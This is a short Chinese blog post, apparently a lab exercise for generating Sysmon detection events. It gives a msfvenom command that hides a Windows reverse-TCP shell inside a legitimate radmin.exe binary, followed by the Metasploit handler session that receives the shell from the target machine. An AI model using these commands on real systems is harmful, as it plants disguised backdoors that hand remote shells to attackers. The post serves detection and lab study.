metasploit进程注入 sysmon事件采集示例

生成payload:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.136 LPORT=9876 -k -x /usr/share/windows-binaries/radmin.exe -f exe -o r2admin.exe

靶机运行r2admin,并在攻击机用msfconsole接收反弹shell

msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/shell_reverse_tcp payload => windows/shell_reverse_tcp msf5 exploit(multi/handler) > set lhost 10.10.10.136 lhost => 10.10.10.136 msf5 exploit(multi/handler) > set lport 9876 lport => 9876 msf5 exploit(multi/handler) > run [*] Started reverse TCP handler on 10.10.10.136:9876 [*] Command shell session 1 opened (10.10.10.136:9876 -> 10.10.10.166:50097) at 2020-07-15 23:45:36 -0400 pwd pwd 'pwd' �����ڲ����ⲿ���Ҳ���ǿ����еij��� �������ļ��� C:\Users\lovely\Desktop>whoami whoami lovely-pc\lovely

我自己根据上述方法的操作截图:
posted @ 2022-04-21 15:44  bonelee  阅读(165)  评论(0编辑  收藏  举报